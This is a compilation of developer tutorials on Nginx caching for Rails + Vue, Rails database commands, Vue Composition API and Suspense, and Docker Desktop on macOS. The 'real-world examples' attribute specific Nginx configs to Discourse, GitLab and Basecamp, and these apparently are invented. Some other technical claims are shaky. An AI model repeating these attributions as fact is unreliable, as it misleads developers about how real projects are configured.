Part 1: Understanding Request Flow and Caching in a Rails + Vue + Nginx Setup

Introduction

When building modern web applications, performance is a critical factor for user experience and SEO. In setups that combine Rails (for backend logic) with Vue 3 (for the frontend), and Nginx + Passenger as the web server layer, developers must understand how requests flow through the system and how caching strategies can maximize efficiency. Without a clear understanding, issues such as stale content, redundant downloads, or poor Google PageSpeed scores can creep in.

In this series, we will break down the architecture into three detailed parts. In this first part, we’ll look at the basic request flow, why caching is needed, and the specific caching strategies applied for different types of assets (HTML, hashed Vue assets, images, fonts, and SEO files).

🔹 1. Basic Request Flow

Let’s first understand how a browser request travels through our stack. In a Rails + Vue + Nginx setup, the flow is layered so that Nginx acts as the gatekeeper, serving static files directly and passing dynamic requests to Rails via Passenger. This ensures maximum efficiency.

Browser Request (user opens https://mydomain.com)
      |
      v
+-------------------------+
|        Nginx            |
| - Serves static files   |
| - Adds cache headers    |
| - Redirects HTTP → HTTPS|
+-------------------------+
      |
      |---> /public/vite/*   (hashed Vue assets: JS, CSS, images)
      |---> /public/assets/* (general static files, fonts, images)
      |---> /public/*.html   (entry files, e.g. vite.html)
      |---> /sitemap.xml, robots.txt
      |
      v
+-------------------------+
| Passenger + Rails       |
| - Handles API requests  |
| - Renders dynamic views |
| - Business logic        |
+-------------------------+
      |
      v
Browser receives response

Key takeaways:

  • Nginx is optimized for serving static files and does this without invoking Rails.
  • Hashed Vue assets live in /public/vite/ and are safe for long-term caching.
  • HTML entry files like vite.html should never be cached aggressively, as they bootstrap the application.
  • Rails only handles requests that cannot be resolved by static files (APIs, dynamic content, authentication, etc.).
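
To make this concrete, here is a minimal sketch of the kind of server block that ties these pieces together (domain, paths, and environment are placeholders, and the SSL certificate directives are omitted for brevity):

server {
    listen 443 ssl http2;
    server_name mydomain.com;

    # Rails public/ directory: Nginx serves anything that exists here directly
    root /var/www/myapp/current/public;

    # Requests that don't resolve to a static file are handed to Rails via Passenger
    passenger_enabled on;
    passenger_app_env production;

    # The caching location blocks discussed below (/vite/, *.html, assets, SEO files)
    # slot into this server block.
}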

🔹 2. Why Caching Matters

Every time a user visits your site, the browser requests resources such as JavaScript, CSS, images, and fonts. Without caching, the browser re-downloads these assets on every visit, leading to:

  • Slower page load times
  • Higher bandwidth usage
  • Poorer SEO scores (Google PageSpeed penalizes missing caching headers)
  • Increased server load

Caching helps by instructing browsers to reuse resources when possible. However, caching needs to be carefully tuned:

  • Static, versioned assets (like hashed JS files) should be cached for a long time.
  • Dynamic or frequently changing files (like HTML, sitemap.xml) should bypass cache.
  • Non-hashed assets (like assets/*.png) can be cached for a shorter duration.

🔹 3. Caching Strategy in Detail

1. Hashed Vue Assets (/vite/ folder)

Files built by Vite include a content hash in their filenames (e.g., index-B34XebCm.js). This ensures that when the file content changes, the filename changes as well. Browsers see this as a new resource and download it fresh. This makes it safe to cache these files aggressively:

location ^~ /vite/ {
    expires 1y;
    add_header Cache-Control "public, immutable";
}

This tells browsers to cache these files for a year, and the immutable directive prevents unnecessary revalidation. The ^~ modifier matters here: without it, the regex-based location block for general static assets (shown below) would win the match for /vite/*.js and /vite/*.css and downgrade them to its shorter cache time.

2. HTML Files (vite.html and others)

HTML files should always be fresh because they reference the latest asset filenames. If an old HTML file is cached, it might point to outdated JS or CSS, breaking the app. Therefore, HTML must always be served with no-cache:

location ~* \.html$ {
    add_header Cache-Control "no-cache";
}

This forces browsers to check the server every time before using the file.

3. Other Static Assets (images, fonts, non-hashed JS/CSS)

Some assets in /public/assets/ do not have hashed filenames (e.g., logo.png). Caching these too aggressively could cause stale content issues. A shorter cache period (like 1 hour) is a safe balance:

location ~* \.(?:js|css|woff2?|ttf|otf|eot|jpg|jpeg|png|gif|svg|ico)$ {
    expires 1h;
    add_header Cache-Control "public";
}

4. SEO Files (sitemap.xml, robots.txt)

Search engines like Google frequently re-fetch sitemap.xml and robots.txt to keep their index up-to-date. If these files are cached, crawlers may miss recent updates. To avoid this, they should always bypass cache:

location = /sitemap.xml {
    add_header Cache-Control "no-cache";
}
location = /robots.txt {
    add_header Cache-Control "no-cache";
}
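
Once these blocks are in place, you can spot-check the headers Nginx actually sends with curl (the domain is a placeholder; the hashed filename is the example from above):

curl -I https://mydomain.com/vite/index-B34XebCm.js   # expect: Cache-Control: public, immutable
curl -I https://mydomain.com/vite.html                # expect: Cache-Control: no-cache
curl -I https://mydomain.com/sitemap.xml              # expect: Cache-Control: no-cache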

🔹 4. Summary Diagram

The diagram below illustrates the request flow and caching rules:

Browser Request
      |
      v
+------------------+          +-------------------+
|      Nginx       |          | Passenger + Rails |
|------------------|          |-------------------|
| - Serves /vite/* |          | - Dynamic APIs    |
|   (1y immutable) |          | - Auth flows      |
| - Serves .html   |          | - Business logic  |
|   (no-cache)     |          +-------------------+
| - Serves assets/*|
|   (1h cache)     |
| - Serves SEO     |
|   (no-cache)     |
+------------------+
      |
      v
Response to Browser

Let’s bring in some real-world examples from well-known Rails projects so you can see how this fits into practice:

🔹 Example 1: Discourse (Rails + Ember frontend, served via Nginx + Passenger)

  • Request flow:
    • Nginx serves all static JS/CSS files that are fingerprinted (application-9f2c01f2b3f.js).
    • Rails generates these during asset precompilation.
    • Fingerprinting ensures cache-busting (like our vite/index-B34XebCm.js).
  • Caching:
    • In their Nginx config, Discourse sets: location ~ ^/assets/ { expires 1y; add_header Cache-Control "public, immutable"; }
    • All .html responses (Rails views) are marked no-cache.
    • This is exactly the same principle we applied for our /vite/ folder.

🔹 Example 2: GitLab (Rails + Vue frontend, Nginx load balancer)

  • Request flow:
    • GitLab has Vue components bundled by Webpack (similar to Vite in our case).
    • Nginx first checks /public/assets/ for compiled frontend assets.
    • If not found → request is passed to Rails via Passenger.
  • Caching:
    • GitLab sets very aggressive caching for hashed assets, because they change only when a new release is deployed: location ~ ^/assets/.*-[a-f0-9]{32}\.(js|css|png|jpg|svg)$ { expires max; add_header Cache-Control "public, immutable"; }
    • Non-hashed files (like /uploads/ user content) get shorter caching (1 hour or 1 day).
    • HTML pages rendered by Rails = no-cache.

🔹 Example 3: Basecamp (Rails + Hotwire, Nginx + Passenger)

  • Request flow:
    • Their entrypoint is still HTML (application.html.erb) served via Rails.
    • Static assets (CSS/JS/images) precompiled into /public/assets.
    • Nginx serves these directly, without touching Rails.
  • Caching:
    • Rails generates digest-based file names (like style-4f8d9d7.css).
    • Nginx rule: location /assets { expires 1y; add_header Cache-Control "public, immutable"; }
    • Same idea: hashed = long cache, HTML = no cache.

👉 What this shows:

  • All large Rails projects (Discourse, GitLab, Basecamp) follow the same caching pattern we're applying:
    • HTML → no-cache
    • Hashed assets (fingerprinted by build tool) → 1 year, immutable
    • Non-hashed assets → shorter cache (1h–1d)

So what we’re implementing in our setup is the industry standard. ✅

Conclusion

In this part, we established the foundation for how requests move through Nginx, Vue, and Rails, and why caching plays such an essential role in performance and reliability. The key principles are:

  • Hashed files = cache long term
  • HTML and SEO files = never cache
  • Non-hashed static assets = short cache
  • Rails/Passenger handles only dynamic requests

In Part 2, we’ll dive deeper into writing a complete Nginx configuration for Rails + Vue, covering gzip compression, HTTP/2 optimizations, cache busting, and optional Vue Router history mode support.


The Complete Guide to Rails Database Commands: From Basics to Production

Managing databases in Rails can seem overwhelming with all the available commands. This comprehensive guide will walk you through every essential Rails database command, from basic operations to complex real-world scenarios.

Basic Database Commands

Core Database Operations

# Create the database
rails db:create

# Drop (delete) the database
rails db:drop

# Run pending migrations
rails db:migrate

# Rollback the last migration
rails db:rollback

# Rollback multiple migrations
rails db:rollback STEP=3

Schema Management

# Load current schema into database
rails db:schema:load

# Dump current database structure to schema.rb
rails db:schema:dump

# Load structure from structure.sql (for complex databases)
# Note: the db:structure:* tasks were removed in Rails 7; set
# config.active_record.schema_format = :sql and use db:schema:load / db:schema:dump instead
rails db:structure:load

# Dump database structure to structure.sql
rails db:structure:dump

Seed Data

# Run the seed file (db/seeds.rb)
rails db:seed

Combined Commands: The Powerhouses

rails db:setup

What it does: Sets up database from scratch

rails db:setup

Equivalent to:

rails db:create
rails db:schema:load  # Loads from schema.rb
rails db:seed

When to use:

  • First time setting up project on new machine
  • Fresh development environment
  • CI/CD pipeline setup (see the sketch below)
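
For example, a CI job might bootstrap the database roughly like this (a sketch; adapt the database service, environment, and test command to your pipeline):

# CI setup sketch
bundle install
bin/rails db:setup RAILS_ENV=test   # create the DB, load schema.rb, run seeds
bundle exec rspec                   # or your project's test command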

rails db:reset

What it does: Nuclear option – completely rebuilds database

rails db:reset

Equivalent to:

rails db:drop
rails db:create
rails db:schema:load
rails db:seed

When to use:

  • Development when you want clean slate
  • After major schema changes
  • When your database is corrupted

⚠️ Warning: Destroys all data!

rails db:migrate:reset

What it does: Rebuilds database using migrations

rails db:migrate:reset

Equivalent to:

rails db:drop
rails db:create
rails db:migrate  # Runs all migrations from scratch

When to use:

  • Testing that migrations run cleanly
  • Debugging migration issues
  • Ensuring migration sequence works

Advanced Database Commands

Migration Management

# Rollback to specific migration
rails db:migrate:down VERSION=20240115123456

# Re-run specific migration
rails db:migrate:up VERSION=20240115123456

# Get current migration version
rails db:version

# Check migration status
rails db:migrate:status

Database Information

# Set the environment value stored in the database (fixes environment mismatch errors)
rails db:environment:set RAILS_ENV=development

# Abort (raise) if there are pending migrations
rails db:abort_if_pending_migrations

# Guard task that raises when destructive commands are run against a protected
# environment (e.g. production) without DISABLE_DATABASE_ENVIRONMENT_CHECK=1
rails db:check_protected_environments

Environment-Specific Commands

# Run commands on specific environment
rails db:create RAILS_ENV=production
rails db:migrate RAILS_ENV=staging
rails db:seed RAILS_ENV=test

Real-World Usage Scenarios

Scenario 1: New Developer Onboarding

# New developer joins the team
git clone project-repo
cd project
bundle install

# Set up database
rails db:setup

# Or if you prefer running migrations
rails db:create
rails db:migrate
rails db:seed

Scenario 2: Production Deployment

# Safe production deployment
rails db:migrate RAILS_ENV=production

# Never run these in production:
# rails db:reset        ❌ Will destroy data!
# rails db:schema:load  ❌ Will overwrite everything!

Scenario 3: Development Workflow

# Daily development cycle
git pull origin main
rails db:migrate          # Run any new migrations

# If you have conflicts or issues
rails db:rollback         # Undo last migration
# Fix migration file
rails db:migrate          # Re-run

# Major cleanup during development
rails db:reset           # Nuclear option

Scenario 4: Testing Environment

# Fast test database setup
rails db:schema:load RAILS_ENV=test

# Or use the test-specific command
rails db:test:prepare

Environment-Specific Best Practices

Development Environment

# Liberal use of reset commands
rails db:reset              # ✅ Safe to use
rails db:migrate:reset      # ✅ Safe to use
rails db:setup              # ✅ Safe for fresh start

Staging Environment

# Mirror production behavior
rails db:migrate RAILS_ENV=staging  # ✅ Recommended
rails db:seed RAILS_ENV=staging     # ✅ If needed

# Avoid
rails db:reset RAILS_ENV=staging    # ⚠️ Use with caution

Production Environment

# Only safe commands
rails db:migrate RAILS_ENV=production     # ✅ Safe
rails db:rollback RAILS_ENV=production    # ⚠️ With backup

# Never use in production
rails db:reset RAILS_ENV=production       # ❌ NEVER!
rails db:drop RAILS_ENV=production        # ❌ NEVER!
rails db:schema:load RAILS_ENV=production # ❌ NEVER!

Pro Tips and Gotchas

Migration vs Schema Loading

# For existing databases with data
rails db:migrate          # ✅ Incremental, safe

# For fresh databases
rails db:schema:load      # ✅ Faster, clean slate

Data vs Schema

Remember that some operations preserve data differently:

  • db:migrate: Preserves existing data, applies incremental changes
  • db:schema:load: Loads clean schema, no existing data
  • db:reset: Destroys everything, starts fresh

Common Workflow Commands

# The "fix everything" development combo
rails db:reset && rails db:migrate

# The "fresh start" combo  
rails db:drop db:create db:migrate db:seed

# The "production-safe" combo
rails db:migrate db:seed

Quick Reference Cheat Sheet

Command          | Use Case            | Data Safety          | Speed
db:migrate       | Incremental updates | ✅ Safe              | Medium
db:setup         | Initial setup       | ✅ Safe (new DB)     | Fast
db:reset         | Clean slate         | ❌ Destroys all      | Fast
db:migrate:reset | Test migrations     | ❌ Destroys all      | Slow
db:schema:load   | Fresh schema        | ❌ No data migration | Fast
db:seed          | Add sample data     | ✅ Additive          | Fast

Conclusion

Understanding Rails database commands is crucial for efficient development and safe production deployments. Start with the basics (db:create, db:migrate, db:seed), get comfortable with the combined commands (db:setup, db:reset), and always remember the golden rule: be very careful with production databases!

The key is knowing when to use each command:

  • Development: Feel free to experiment with db:reset and friends
  • Production: Stick to db:migrate and always have backups
  • Team collaboration: Use migrations to keep everyone in sync

Remember: migrations tell the story of how your database evolved, while schema files show where you ended up. Both are important, and now you know how to use all the tools Rails gives you to manage them effectively.


⚡ Understanding Vue.js Composition API

Vue 3 introduced the Composition API — a modern, function-based approach to building components. If you’ve been using the Options API (data, methods, computed, etc.), this might feel like a big shift. But the Composition API gives you more flexibility, reusability, and scalability.

In this post, we’ll explore what it is, how it works, why it matters, and we’ll finish with a real-world API fetching example.

🧩 What is the Composition API?

The Composition API is a collection of functions (like ref, reactive, watch, computed) that you use inside a setup() function (or <script setup>). Instead of organizing code into option blocks, you compose logic directly.

👉 In short:
It lets you group related logic together in one place, making your components more readable and reusable.


🔑 Core Features

Here are the most important building blocks (a short sketch combining several of them follows this list):

  • ref() → create reactive primitive values (like numbers, strings, booleans).
  • reactive() → create reactive objects or arrays.
  • computed() → define derived values based on reactive state.
  • watch() → run side effects when values change.
  • Lifecycle hooks (onMounted, onUnmounted, etc.) → usable inside setup().
  • Composables → reusable functions built with Composition API logic.
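
To see a few of these building blocks working together, here is a small sketch (the cart example is invented for illustration):

<script setup>
import { reactive, computed, watch } from 'vue'

// reactive() for an object, computed() for a derived value,
// watch() for a side effect whenever that derived value changes
const cart = reactive({ items: [], taxRate: 0.1 })

const total = computed(() =>
  cart.items.reduce((sum, item) => sum + item.price, 0) * (1 + cart.taxRate)
)

watch(total, (newTotal) => {
  console.log(`Cart total is now ${newTotal}`)
})
</script>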

⚖️ Options API vs Composition API

Options API (Vue 2 style)

<script>
export default {
  data() {
    return {
      count: 0
    }
  },
  methods: {
    increment() {
      this.count++
    }
  }
}
</script>


Composition API (Vue 3 style)

<script setup>
import { ref } from 'vue'

const count = ref(0)
const increment = () => count.value++
</script>

<template>
  <p>{{ count }}</p>
  <button @click="increment">+</button>
</template>

✨ Notice the difference:

  • With Options API, logic is split across data and methods.
  • With Composition API, everything (state + methods) is grouped together.

🚀 Why Use Composition API?

  1. Better logic organization → Group related logic in one place.
  2. Reusability → Extract shared code into composables (useAuth, useFetch, etc.).
  3. TypeScript-friendly → Works smoothly with static typing.
  4. Scalable → Easier to manage large and complex components.

🌍 Real-World Example: Fetching API Data

Let’s say we want to fetch user data from an API.

Step 1: Create a composable useFetch.js

// composables/useFetch.js
import { ref, onMounted } from 'vue'

export function useFetch(url) {
  const data = ref(null)
  const error = ref(null)
  const loading = ref(true)

  onMounted(async () => {
    try {
      const res = await fetch(url)
      data.value = await res.json()
    } catch (err) {
      error.value = err
    } finally {
      loading.value = false
    }
  })

  return { data, error, loading }
}


Step 2: Use it inside a component

<script setup>
import { useFetch } from '@/composables/useFetch'

const { data, error, loading } = useFetch('https://jsonplaceholder.typicode.com/users')
</script>

<template>
  <div>
    <p v-if="loading">Loading...</p>
    <p v-if="error">Error: {{ error.message }}</p>
    <ul v-if="data">
      <li v-for="user in data" :key="user.id">{{ user.name }}</li>
    </ul>
  </div>
</template>

✨ What happened?

  • The composable useFetch handles logic for fetching.
  • The component only takes care of rendering.
  • Now, you can reuse useFetch anywhere in your app.

🎯 Final Thoughts

The Composition API makes Vue components cleaner, reusable, and scalable. It might look different at first, but once you start grouping related logic together, you’ll see how powerful it is compared to the Options API.

If you’re building modern Vue 3 apps, learning the Composition API is a must.


🔄 Vue.js: Composition API vs Mixins vs Composables

When working with Vue, developers often ask:

  • What’s the difference between the Composition API and Composables?
  • Do Mixins still matter in Vue 3?
  • When should I use one over the other?

Let’s break it down with clear explanations and examples.

🧩 Mixins (Vue 2 era)

🔑 What are Mixins?

Mixins are objects that contain reusable logic (data, methods, lifecycle hooks) which can be merged into components.

⚡ Example: Counter with a mixin

// mixins/counterMixin.js
export const counterMixin = {
  data() {
    return {
      count: 0
    }
  },
  methods: {
    increment() {
      this.count++
    }
  }
}

<script>
import { counterMixin } from '@/mixins/counterMixin'

export default {
  mixins: [counterMixin]
}
</script>

<template>
  <p>{{ count }}</p>
  <button @click="increment">+</button>
</template>

✅ Pros

  • Easy to reuse logic.
  • Simple syntax.

❌ Cons

  • Name conflicts → two mixins or component methods can silently override each other (see the sketch below).
  • Hard to track where logic comes from in large apps.
  • Doesn’t scale well.
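
Here is a quick sketch of how the name-conflict problem shows up (both mixins are hypothetical):

// Both mixins define `count`; when merged, the later mixin's value quietly wins.
const counterMixin = {
  data() {
    return { count: 0 }
  }
}

const timerMixin = {
  data() {
    return { count: 60 }
  }
}

export default {
  mixins: [counterMixin, timerMixin]
  // this.count starts at 60; counterMixin's initial value has been overridden
}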

👉 That’s why Vue 3 encourages Composition API + Composables instead.


⚙️ Composition API

🔑 What is it?

The Composition API is a set of functions (ref, reactive, watch, computed, lifecycle hooks) that let you write components in a function-based style.

⚡ Example: Counter with Composition API

<script setup>
import { ref } from 'vue'

const count = ref(0)
const increment = () => count.value++
</script>

<template>
  <p>{{ count }}</p>
  <button @click="increment">+</button>
</template>

👉 Unlike Mixins, all logic lives inside the component — no magic merging.

✅ Pros

  • Explicit and predictable.
  • Works great with TypeScript.
  • Organizes related logic together instead of scattering across options.

🔄 Composables

🔑 What are Composables?

Composables are just functions that use the Composition API to encapsulate and reuse logic.

They’re often named with a use prefix (useAuth, useCounter, useFetch).

⚡ Example: Reusable counter composable

// composables/useCounter.js
import { ref } from 'vue'

export function useCounter() {
  const count = ref(0)
  const increment = () => count.value++
  return { count, increment }
}

Usage in a component:

<script setup>
import { useCounter } from '@/composables/useCounter'

const { count, increment } = useCounter()
</script>

<template>
  <p>{{ count }}</p>
  <button @click="increment">+</button>
</template>

✅ Pros

  • Clear and explicit (unlike Mixins).
  • Reusable across multiple components.
  • Easy to test (plain functions).
  • Scales beautifully in large apps.

🆚 Side-by-Side Comparison

FeatureMixins 🧩Composition API ⚙️Composables 🔄
Introduced inVue 2Vue 3Vue 3
ReusabilityYes, but limitedMostly inside componentsYes, very flexible
Code OrganizationScattered across mixinsGrouped inside setup()Encapsulated in functions
ConflictsPossible (naming issues)NoneNone
TestabilityHarderGoodExcellent
TypeScript SupportPoorStrongStrong
Recommended in Vue 3?❌ Not preferred✅ Yes✅ Yes

🎯 Final Thoughts

  • Mixins were useful in Vue 2, but they can cause naming conflicts and make code hard to trace.
  • Composition API solves these issues by letting you organize logic in setup() with functions like ref, reactive, watch.
  • Composables build on the Composition API — they’re just functions that encapsulate and reuse logic across components.

👉 In Vue 3, the recommended pattern is:

  • Use Composition API inside components.
  • Extract reusable logic into Composables.
  • Avoid Mixins unless maintaining legacy Vue 2 code.

🚀 Optimizing Vue 3 Page Rendering with <Suspense> for Async Components

When building a homepage in Vue, it’s common to split the UI into multiple components. Some of them are purely presentational, while others fetch data from APIs.

Here’s the problem: if one of those components uses an await during its setup, Vue will wait for it before rendering the parent. That means a single API call can block the entire page from appearing to the user.

That’s not what we want. A modern web app should feel snappy and responsive, even when waiting for data.

Vue 3 gives us the perfect tool for this: <Suspense>.


🏗 The Starting Point

Let’s look at a simplified index.vue homepage:

<template>
  <div>
    <Component1 :perServingPrice="data.perServingPrice" />

    <Component2 :perServingPrice="data.perServingPrice" />
    <Component3 :landingContentKey="landingContentKey" />
    <Component4 :perServingPrice="data.perServingPrice" />
    <Component5 :landingContentKey="landingContentKey" />
    <Component6 :recipes="data.recipes" />
    <Component7 :landingContentKey="landingContentKey" />
    <Component8 :recipes="data.recipes" />
  </div>
</template>

<script setup lang="ts">
import Component1 from '@/components/HomePage/Component1.vue'
import Component2 from '@/components/HomePage/Component2.vue'
import Component3 from '@/components/HomePage/Component3.vue'
import Component4 from '@/components/HomePage/Component4.vue'
import Component5 from '@/components/HomePage/Component5.vue'
import Component6 from '@/components/HomePage/Component6.vue'
import Component7 from '@/components/HomePage/Component7.vue'
import Component8 from '@/components/HomePage/Component8.vue'

const data = {
  perServingPrice: 10,
  recipes: [],
}
const landingContentKey = 'homepage'
</script>

Now imagine:

  • Component2 fetches special offers.
  • Component6 fetches recipe data.
  • Component8 fetches trending dishes.

If those API calls are written like this inside a child component:

<script setup lang="ts">
const response = await fetch('/api/recipes')
const recipes = await response.json()
</script>

➡️ Vue will not render the parent index.vue until this await is finished. That means the entire page waits, even though other components (like Component1 and Component3) don’t need that data at all.


⏳ Why Blocking Is a Problem

Let’s simulate the render timeline without <Suspense>:

  • At t=0s: Page requested.
  • At t=0.3s: HTML + JS bundles load.
  • At t=0.4s: Component2 makes an API request.
  • At t=0.8s: Component6 makes an API request.
  • At t=1.2s: Component8 makes an API request.
  • At t=2.0s: All API responses return → finally the page renders.

The user stares at a blank page until everything resolves. 😩


🎯 Enter <Suspense>

The <Suspense> component lets you wrap child components that might suspend (pause) while awaiting data. Instead of blocking the whole page, Vue shows:

  • The rest of the parent page (immediately).
  • A fallback placeholder for the async child until it’s ready.

📝 Example: Wrapping Component6

<Suspense>
  <template #default>
    <Component6 :recipes="data.recipes" />
  </template>
  <template #fallback>
    <div class="skeleton">Loading recipes...</div>
  </template>
</Suspense>

Here’s what happens now:

  • At t=0.4s: The page renders.
  • <Component6> isn’t ready yet, so Vue shows the fallback (Loading recipes...).
  • At t=2.0s: Recipes arrive → Vue automatically replaces the fallback with the actual component.

Result: The page is usable instantly. ✅


🔄 Applying Suspense to Multiple Components

We can selectively wrap only the async components:

<template>
  <div>
    <Component1 :perServingPrice="data.perServingPrice" />

    <Suspense>
      <template #default>
        <Component2 :perServingPrice="data.perServingPrice" />
      </template>
      <template #fallback>
        <div class="skeleton">Loading deals...</div>
      </template>
    </Suspense>

    <Component3 :landingContentKey="landingContentKey" />

    <Suspense>
      <template #default>
        <Component6 :recipes="data.recipes" />
      </template>
      <template #fallback>
        <div class="skeleton">Loading recipes...</div>
      </template>
    </Suspense>

    <Component7 :landingContentKey="landingContentKey" />

    <Suspense>
      <template #default>
        <Component8 :recipes="data.recipes" />
      </template>
      <template #fallback>
        <div class="skeleton">Loading trending dishes...</div>
      </template>
    </Suspense>
  </div>
</template>


📦 Combining with Async Imports

Vue also allows lazy-loading the component itself, not just the data.

<script setup lang="ts">
import { defineAsyncComponent } from 'vue'

const Component6 = defineAsyncComponent(() =>
  import('@/components/HomePage/Component6.vue')
)
</script>

Now:

  • If the component file is heavy, Vue won’t even load it until needed.
  • Suspense covers both the network request and the async component loading.

📊 Before vs After

Without Suspense:

  • Whole page waits until all API calls resolve.
  • User sees blank → page suddenly appears.

With Suspense:

  • Page renders instantly with placeholders.
  • Components hydrate individually as data arrives.
  • User perceives speed even if data is slow.

🏆 Best Practices

  1. Wrap only async components. Don’t spam <Suspense> everywhere.
  2. Always provide a meaningful fallback. Use skeleton loaders, not just “Loading…”.
  3. Lift state when appropriate. If multiple components need the same data, fetch once in the parent and pass it down as props.
  4. Combine Suspense with code-splitting. Async imports keep your initial bundle small.
  5. Group related components. You can wrap multiple components in a single <Suspense> if they depend on the same async source.

✅ Conclusion

With Vue 3 <Suspense>, you can make sure that your homepage never blocks while waiting for data. Each component becomes non-blocking and self-contained, showing a loader until it’s ready.

This is the same direction React and Angular have taken:

  • React → Suspense + Concurrent Rendering.
  • Angular → Route Resolvers + AsyncPipe.
  • Vue → <Suspense> + async setup.

👉 If you want your Vue pages to feel fast and modern, adopt <Suspense> for async components.


Happy Vue Coding!

Working with Docker on Mac: Core Docker Concepts | Docker Desktop

Docker is an open‑source platform for packaging applications and their dependencies into lightweight, portable units called containers, enabling consistent behavior across development, testing, and production environments (Docker, Wikipedia). Its core component, the Docker Engine, powers container execution, while Docker Desktop—a user‑friendly application tailored for macOS—bundles the Docker Engine, Docker CLI, Docker Compose, Kubernetes integration, and a visual Dashboard into a seamless package (Docker Documentation).

On macOS, Docker Desktop simplifies container workflows by leveraging native virtualization (HyperKit on Intel Macs, Apple’s Hypervisor.framework on Apple Silicon), eliminating the need for cumbersome VMs like VirtualBox (The Mac Observer, Medium).

Installation is straightforward: simply download the appropriate .dmg installer (Intel or Apple Silicon), drag Docker into the Applications folder, and proceed through setup—granting permissions and accepting licensing as needed (LogicCore Digital Blog). Once up and running, you can verify your setup via commands like:

docker --version
docker run hello-world
docker compose version

These commands confirm successful installation and provide instant access to Docker’s ecosystem on your Mac.


Commands Executed in Local System:

➜ docker --version
zsh: command not found: docker
# docker CLI not on PATH yet: install/start Docker Desktop first, then retry

➜ docker ps
# check the exact container name:
➜ docker ps --format "table {{.Names}}\t{{.Image}}"

# rebuild the containers
➜ docker-compose down
➜ docker-compose up --build

# Error: target webpacker: failed to solve: error getting credentials - err: exec: "docker-credential-desktop": executable file not found in $PATH, out: ``

➜ cat ~/.docker/config.json # remove "credsStore": "desktop"

# Remove all containers and images
➜ docker container prune -f
➜ docker image prune -f
➜ docker ps -a # check containers
➜ docker images # check images
➜ docker-compose up --build -d # build again

# docker exec targets a running container (name or ID), not an image

# postgres
➜ docker exec -it container-name psql -U username -d database_name

# rails console
➜ docker exec -it container-name rails c

# get into the docker container shell
➜ docker exec -it container-name bash

🐳 1. Difference between docker compose up --build and docker compose up

docker compose up

  • Just starts the containers using the existing images.
  • If the image for a service doesn’t exist locally, Docker will pull it from the registry (e.g., Docker Hub).
  • It will not rebuild your image unless you explicitly tell it to.

docker compose up --build

  • Forces Docker to rebuild the images from the Dockerfile before starting the containers.
  • Useful when you’ve changed:
    • The Dockerfile
    • Files copied into the image
    • Dependencies
  • This ensures your running containers reflect your latest code and build instructions.

📌 Example:

docker compose up         # Use existing images (fast startup)
docker compose up --build # Rebuild images before starting

If you changed your app code and your Docker setup uses bind mounts (volumes), you usually don’t need --build unless the image itself changed.
If you changed the Dockerfile, then you need --build.
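
For reference, this is what such a bind mount looks like in a compose file (the service name and paths are illustrative):

services:
  main-app:
    build: .
    volumes:
      - .:/app   # bind mount: the host source tree is visible inside the container,
                 # so code edits show up without rebuilding the image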


🖥 2. Why we use Docker Desktop & can we use Docker without it?

Docker Desktop is basically a GUI + background service that makes Docker easy to run on macOS and Windows.
It includes:

  • Docker Engine (runs containers)
  • Docker CLI
  • Docker Compose
  • Kubernetes (optional)
  • Settings & resource controls (CPU, RAM)
  • Networking setup
  • A UI to view containers, images, logs, etc.

Why needed on macOS & Windows?

  • Docker requires Linux kernel features like cgroups & namespaces.
  • macOS and Windows don’t have these natively, so Docker Desktop runs a lightweight Linux VM behind the scenes (using HyperKit, WSL2, etc.).
  • Without Docker Desktop, you’d need to set up that Linux VM manually, install Docker inside it, and configure networking — which is more complex.

Can you use Docker without Docker Desktop?
Yes, but:

  • On macOS/Windows — you’d have to:
    • Install a Linux VM manually (VirtualBox, VMware, UTM, etc.)
    • SSH into it
    • Install Docker Engine
    • Expose ports and share files manually
  • On Linux — you don’t need Docker Desktop at all, you can install Docker Engine directly via: sudo apt install docker.io
  • On Windows, Docker Engine can also run inside WSL2 without the Docker Desktop GUI, but that requires setting up WSL2 and installing Docker Engine in the Linux distro yourself.

💡 In short:

  • Use --build when you change something in the image definition.
  • Docker Desktop = easiest way to run Docker on macOS/Windows.
  • You can skip Docker Desktop, but then you must manually set up a Linux VM with Docker.

🧩 1. Core Docker Concepts

  • Image — a read-only blueprint (template) that defines what your app needs to run (OS base, packages, configs, your code). Built from a Dockerfile. Analogy: a recipe for a dish.
  • Container — a running instance of an image. Containers are isolated processes, not full OSes. Analogy: a meal prepared from the recipe.
  • Volume — persistent storage for containers. Survives container restarts or deletions. Analogy: a pantry/fridge where food stays even after cooking is done.
  • Docker Compose — a YAML-based tool to define & run multi-container apps. Lets you describe services, networks, and volumes in one file and start them all at once (see the sketch below). Analogy: a restaurant order sheet for multiple dishes at once.
  • Network — a virtual network that containers use to talk to each other or the outside world. Analogy: a kitchen intercom system.
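
As a concrete sketch of how Compose ties these concepts together (image versions, service names, and paths are assumptions, not taken from a specific project):

# docker-compose.yml: minimal Rails + Postgres sketch
services:
  db:
    image: postgres:16
    environment:
      POSTGRES_PASSWORD: password
    volumes:
      - pgdata:/var/lib/postgresql/data   # named volume: data outlives the container

  main-app:
    build: .                              # image built from the project's Dockerfile
    command: bundle exec rails server -b 0.0.0.0
    ports:
      - "3001:3000"                       # host:container
    depends_on:
      - db                                # services share the default network and
                                          # reach each other by service name (db)

volumes:
  pgdata: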

2. Kubernetes in simple words

Kubernetes (K8s) is a container orchestration system. It’s what you use when you have many containers across many machines and you need to manage them automatically.

What it does:

  • Deploy containers on a cluster of machines
  • Restart them if they crash
  • Scale up/down automatically
  • Load balance traffic between them
  • Handle configuration and secrets
  • Do rolling updates with zero downtime

📌 Analogy
If Docker Compose is like cooking multiple dishes at home, Kubernetes is like running a huge automated kitchen in a restaurant chain — you don’t manually turn on each stove; the system manages resources and staff.


🍏 3. How Docker Works on macOS

As noted earlier, Docker needs Linux kernel features (cgroups, namespaces, etc.), and macOS doesn’t have them.

So on macOS:

  • Docker Desktop runs a lightweight Linux virtual machine under the hood using Apple’s HyperKit (before) or Apple Virtualization Framework (newer versions).
  • That VM runs the Docker Engine.
  • Your docker CLI in macOS talks to that VM over a socket.
  • All containers run inside that Linux VM, not directly on macOS.

Workflow:

Mac Terminal → Docker CLI → Linux VM in background → Container runs inside VM


4. Hardware Needs for Docker on macOS

Yes, VMs can be heavy, but Docker’s VM for macOS is minimal — not like a full Windows or Ubuntu desktop VM.

Typical Docker Desktop VM:

  • Base OS: Tiny Linux distro (Alpine or LinuxKit)
  • Memory: Usually 2–4 GB (configurable)
  • CPU: 2–4 virtual cores (configurable)
  • Disk: ~1–2 GB base, plus images & volumes you pull

Recommended host machine for smooth Docker use on macOS:

  • RAM: At least 8 GB (16 GB is comfy)
  • CPU: Modern dual-core or quad-core
